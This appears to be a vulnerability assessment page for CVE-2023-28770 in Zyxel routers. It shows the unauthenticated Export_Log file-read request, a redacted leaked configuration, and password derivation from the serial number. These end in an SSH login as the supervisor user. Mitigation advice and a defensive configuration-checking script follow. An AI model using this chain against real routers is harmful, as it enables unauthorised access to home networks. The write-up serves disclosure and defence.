Attacker Value: Very High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: None
Privileges Required: None
Attack Vector: Network

CVE-2023-28770

Disclosure Date: April 27, 2023
MITRE ATT&CK Tactics
Execution
Initial Access

Description

The sensitive information exposure vulnerability in the CGI “Export_Log” and the binary “zcmd” in Zyxel DX5401-B0 firmware versions prior to V5.17(ABYO.1)C0 could allow a remote unauthenticated attacker to read the system files and to retrieve the password of the supervisor from the encrypted file.

Technical Analysis

In December 2022, SEC Consult released a blog post titled The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users. The post explains an unauthenticated buffer overflow in more than 40 different Zyxel router models and the vast number (thousands) of vulnerable routers that are accessible via the Internet.
The impact is still quite limited because the published Metasploit exploit module only works from the LAN side.

However, the unauthenticated buffer overflow is not the only vulnerability on these routers: SEC Consult discovered a further seven vulnerabilities, described in their security analysis Multiple Critical Vulnerabilities in multiple Zyxel devices.
While reading the security analysis and reviewing the other vulnerabilities, I discovered a new opportunity to build an exploit by chaining two other vulnerabilities that will allow an unauthenticated attacker to get privileged access to the Zyxel router from either the WAN or LAN side. The potential of this exploit to attack from the WAN side makes it quite dangerous, taking into account the large number of non-patched Zyxel routers out there on the Internet.

Recently, CVE-2023-28770 has been released covering the LFI vulnerability that is used in this chained exploit.

Zyxel router chained RCE

Exploiting an unauthenticated local file disclosure (LFI) vulnerability and a weak password derivation algorithm

The first vulnerability that stood out to me is the LFI vulnerability that is discussed in section 2 of the Security Analysis by SEC Consult.
The LFI vulnerability is present in the zhttp binary and allows an unauthenticated attacker to read the entire configuration of the router via the vulnerable endpoint /Export_Log?/data/zcfg_config.json.

The Burp request below shows a redacted response with the information that is disclosed: encrypted passwords, account information, service configuration (FTP, Telnet, SSH) and hardware details such as serial number and hardware model. In total it is around 4000 lines of nested JSON that you would not want to share with anyone out there.

LFI Burp request and response

GET /Export_Log?/data/zcfg_config.json HTTP/1.1
Host: zyxel-vuln-router:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Connection: close

Response (REDACTED)

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 148678
Date: Fri, 14 Apr 2023 08:47:46 GMT
X-Frame-Options: sameorigin
Content-Security-Policy: frame-ancestors 'self'

---- Hardware Information ----
{
    "Manufacturer":"ZYXEL",
    "ManufacturerOUI":"XXXXX",
    "ModelName":"VMG3625-T20A",
    "Description":"Wireless AC VDSL2 4-port Gateway with USB",
    "ProductClass":"VMG3625-T20A",
    "SerialNumber":"S000Y00000000",
    "SoftwareVersion":"V5.30(ABOU.2)b1_I0_20180821",
    "AdditionalHardwareVersion":"",
    "AdditionalSoftwareVersion":"",
    "UpTime":607055,
    "FirstUseDate":"2023-03-21T09:07:41",
    "VendorConfigFileNumberOfEntries":0,
    "SupportedDataModelNumberOfEntries":0,
    "ProcessorNumberOfEntries":0,
    "VendorLogFileNumberOfEntries":0,
    "LocationNumberOfEntries":0,
    "FixManufacturerOUI":""
  },

---- Account Information----
"X_ZYXEL_LoginCfg":{
    "LoginGroupConfigurable":true,
    "LogGp":[
      {
        "GP_Privilege":"_encrypt_XXXXXXXXXXXXXX",
        "Account":[
          {
            "AutoShowQuickStart":false,
            "Enabled":true,
            "EnableQuickStart":true,
            "Page":"",
            "Username":"root",
            "Password":"",
            "PasswordHash":"",
            "Privilege":"_encrypt_XXXXXXXXXXXXX",
            "GetConfigByFtp":true,
            "DefaultPassword":"_encrypt_XXXXXXXXXXXXXX",
            "DefaultGuiPassword":"",
            "ResetDefaultPassword":false,
            "shadow":"root:$6$XXXXXXXXXXX:0::::::\n",
            "smbpasswd":"root:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:33A9D53C23525B5F63A0C536445E2B76:[U          ]:LCT-0000004E:\n",
            "ConfigAccountFromWAN":false,
            "DefPwLength":8,
            "AccountCreateTime":0,
            "AccountRetryTime":3,
            "AccountIdleTime":300,
            "AccountLockTime":300,
            "RemoHostAddress":"",
            "DotChangeDefPwd":false,
            "ShowSkipBtnInChgDefPwdPage":false,
            "AutoGenPwdBySn":false,
            "RemoteAccessPrivilege":"LAN",
            "OldDefaultPassword":"",
            "CardOrder":"",
            "ThemeColor":"",
            "HiddenPage":""
          },
          {
            "AutoShowQuickStart":false,
            "Enabled":true,
            "EnableQuickStart":true,
            "Page":"",
            "Username":"supervisor",
            "Password":"",
            "PasswordHash":"",
            "Privilege":"_encrypt_XXXXXXXXXXX",
            "DefaultPassword":"_encrypt_XXXXXXXXXXX",
            "DefaultGuiPassword":"",
            "ResetDefaultPassword":false,
            "shadow":"supervisor:$6$XXXXXXXXXX:0::::::\n",
            "smbpasswd":"supervisor:12:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:33A9D53C23525B5F63A0C536445E2B76:[U          ]:LCT-0000004E:\n",
            "ConfigAccountFromWAN":false,
            "DefPwLength":8,
            "AccountCreateTime":0,
            "AccountRetryTime":3,
            "AccountIdleTime":300,
            "AccountLockTime":300,
            "RemoHostAddress":"",
            "DotChangeDefPwd":false,
            "ShowSkipBtnInChgDefPwdPage":false,
            "AutoGenPwdBySn":false,
            "RemoteAccessPrivilege":"LAN",
            "OldDefaultPassword":"",
            "CardOrder":"",
            "ThemeColor":"",
            "HiddenPage":""
          }
        ],
        "Level":"high"
      },

---- Service Information ----
  "X_ZYXEL_RemoteManagement":{
    "Service":[
      {
        "Name":"HTTP",
        "Enable":true,
        "Protocol":6,
        "Port":8080,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":1,
        "LifeTime":20,
        "BoundInterfaceList":""
      },
      {
        "Name":"HTTPS",
        "Enable":true,
        "Protocol":6,
        "Port":443,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":true,
        "LifeTime":20,
        "BoundInterfaceList":""
      },
      {
        "Name":"FTP",
        "Enable":true,
        "Protocol":6,
        "Port":21,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":true,
        "LifeTime":20,
        "BoundInterfaceList":""
      },
      {
        "Name":"TELNET",
        "Enable":true,
        "Protocol":6,
        "Port":23,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":true,
        "LifeTime":20,
        "BoundInterfaceList":""
      },
      {
        "Name":"SSH",
        "Enable":true,
        "Protocol":6,
        "Port":22,
        "Mode":"LAN_WAN",
        "TrustAll":true,
        "OldMode":"LAN_ONLY",
        "RestartDeamon":true,
        "LifeTime":20,
        "BoundInterfaceList":""
      },

On its own, this information disclosure does not pose a direct threat to these routers. Attackers could of course try to crack the disclosed shadow password hashes, but that would take a long time.

So is there any other way to use the disclosed information for a successful attack?
And of course the answer is YES!

The second vulnerability that comes into play is the one described in section 3 of the analysis, “Unsafe Storage of Sensitive Data”.
It explains the technique used to decrypt the _encrypt_XXXXXX passwords in the JSON configuration file using a static AES key and IV.
But my attention was drawn more to another analysis, Getting root on a Zyxel VMG8825-T50 router by Thomas Rinsma from 2020, which was referenced at the bottom of the section and in which Thomas explains the password derivation techniques used on Zyxel routers.
In particular, the section “Tangent 2: key and password derivation mechanisms” is quite interesting: it describes in detail how the supervisor user password can be derived from the serial number of the router.

So what if we use the LFI vulnerability to obtain the serial number of the router and derive the supervisor password with this password derivation technique?
We can then use the disclosed router services information to check whether SSH or Telnet is enabled and accessible from the WAN, and try to log in as supervisor to gain access to the router.

Bogi Napoleon Wennerstrøm has reverse engineered and implemented some of these derivation functions that produce the supervisor password.
His repository can be found on GitHub.
I tested his password derivation functions and indeed I can confirm that either zcfgBeCommonGenKeyBySerialNumMethod2 or zcfgBeCommonGenKeyBySerialNumMethod3 works on vulnerable Zyxel routers.

# python ./main.py S000Y00000000
zcfgBeCommonGenKeyBySerialNum                   : A43338B488
zcfgBeCommonGenKeyBySerialNum_CBT               : UdcTaX78
zcfgBeCommonGenKeyBySerialNumMethod2            : 2dc1a078  <==
zcfgBeCommonGenKeyBySerialNumMethod3            : 58Pxnwdefr <==
zcfgBeCommonGenKeyBySerialNumConfigLength(1)    : EXXAY7XF
zcfgBeCommonGenKeyBySerialNumConfigLength(2)    : 4UxwvUxf
zcfgBeCommonGenKeyBySerialNumConfigLength(3)    : 4UxavUxf
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(1) : EXXAY7XF
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(2) : 4UxwvUxf
zcfgBeCommonGenKeyBySerialNumConfigLengthOld(3) : 4UxavUxf
┌──(root💀cuckoo)-[~/zyxel_exploit/zyxel-vmg8825-keygen]
└─# ssh supervisor@zyxel-vuln-router
supervisor@zyxel-vuln-router's password:
$ uname -a
Linux VMG3625-T20A 2.6.36 #7 SMP Sat Aug 18 12:18:02 CET 2018 mips GNU/Linux
$ id
uid=12(supervisor) gid=12 groups=12
$
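To look at the same chain from the defender's side, the following added example (not part of the original assessment or of the Metasploit module) walks a configuration in the shape of the disclosed zcfg_config.json, reports what an unauthenticated reader of that file could chain together (serial number, enabled supervisor account, services reachable from the WAN), and checks whether the temporary mitigation below (no SSH, Telnet or FTP facing the WAN) is in place. The sample configuration is constructed and the outer object name "DeviceInfo" is an assumption.

```python
import json

# Constructed sample in the shape of the disclosed zcfg_config.json shown above;
# the outer name "DeviceInfo" and all values are made up, none come from a real device.
SAMPLE_CONFIG = json.loads("""{
 "DeviceInfo": {"ModelName": "VMG3625-T20A", "SerialNumber": "S000Y00000000"},
 "X_ZYXEL_LoginCfg": {"LogGp": [{"Account": [
   {"Username": "root", "Enabled": true, "RemoteAccessPrivilege": "LAN"},
   {"Username": "supervisor", "Enabled": true, "RemoteAccessPrivilege": "LAN"}]}]},
 "X_ZYXEL_RemoteManagement": {"Service": [
   {"Name": "HTTP", "Enable": true, "Port": 8080, "Mode": "LAN_WAN"},
   {"Name": "SSH", "Enable": true, "Port": 22, "Mode": "LAN_WAN"},
   {"Name": "TELNET", "Enable": false, "Port": 23, "Mode": "LAN_WAN"},
   {"Name": "FTP", "Enable": true, "Port": 21, "Mode": "LAN_ONLY"}]}
}""")

# Services that give the supervisor account a shell or file access on the router.
SHELL_SERVICES = {"SSH", "TELNET", "FTP"}

def walk(node):
    """Yield every dict in the nested config, depth first, in document order."""
    if isinstance(node, dict):
        yield node
    children = node.values() if isinstance(node, dict) else node if isinstance(node, list) else []
    for child in children:
        yield from walk(child)

def wan_exposed_services(cfg):
    """(Name, Port) of every enabled remote-management service whose Mode includes WAN."""
    return [(d["Name"], int(d["Port"])) for d in walk(cfg)
            if {"Name", "Enable", "Mode", "Port"}.issubset(d)
            and d["Enable"] and "WAN" in str(d["Mode"])]

def chain_exposure(cfg):
    """Summarise what an unauthenticated reader of this file could chain together."""
    serials = [d["SerialNumber"] for d in walk(cfg) if d.get("SerialNumber")]
    users = [d["Username"] for d in walk(cfg) if "Username" in d and d.get("Enabled")]
    svcs = wan_exposed_services(cfg)
    shell_on_wan = [name for name, _ in svcs if name in SHELL_SERVICES]
    return {"serial_disclosed": bool(serials), "supervisor_enabled": "supervisor" in users,
            "wan_services": svcs, "shell_services_on_wan": shell_on_wan,
            "mitigated": not shell_on_wan}  # mitigation in place: no shell service faces the WAN

def disable_wan_shell_services(cfg):
    """Return a copy of cfg with SSH/Telnet/FTP disabled, i.e. the temporary mitigation applied."""
    fixed = json.loads(json.dumps(cfg))  # deep copy via JSON round trip
    for d in walk(fixed):
        if d.get("Name") in SHELL_SERVICES and "Enable" in d:
            d["Enable"] = False
    return fixed
```

Running chain_exposure over your own exported configuration after patching or hardening gives a quick check that no shell service is still reachable from the WAN.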

I have created a Metasploit module that chains these two vulnerabilities together to gain access to vulnerable Zyxel routers.
The PR submission to mainstream Metasploit is complete and the module is available.

Mitigation

Please follow the Zyxel Security Advisory to patch your router.
As a temporary measure, disable all router services such as Telnet, FTP and SSH that allow access to the supervisor user, and configure the web interface to be accessible only by the admin user.

References

  • CVE-2023-28770
  • The enemy from within: Unauthenticated Buffer Overflows in Zyxel routers still haunting users
  • Multiple Critical Vulnerabilities in multiple Zyxel devices
  • Getting root on a Zyxel VMG8825-T50 router
  • Zyxel VMG8825-T50 Supervisor Keygen – GitHub
  • Zyxel Security Advisory
  • Metasploit PR: Zyxel router chained RCE using LFI and weak password derivation algorithm

Credits

Credits go to:
  • SEC Consult team
  • Thomas Rinsma
  • Bogi Napoleon Wennerstrøm

CVSS V3 Severity and Metrics
Base Score: 7.5 High
Impact Score: 3.6
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): None
Availability (A): None

General Information

Vendors

  • zyxel

Products

  • dx5401-b0 firmware
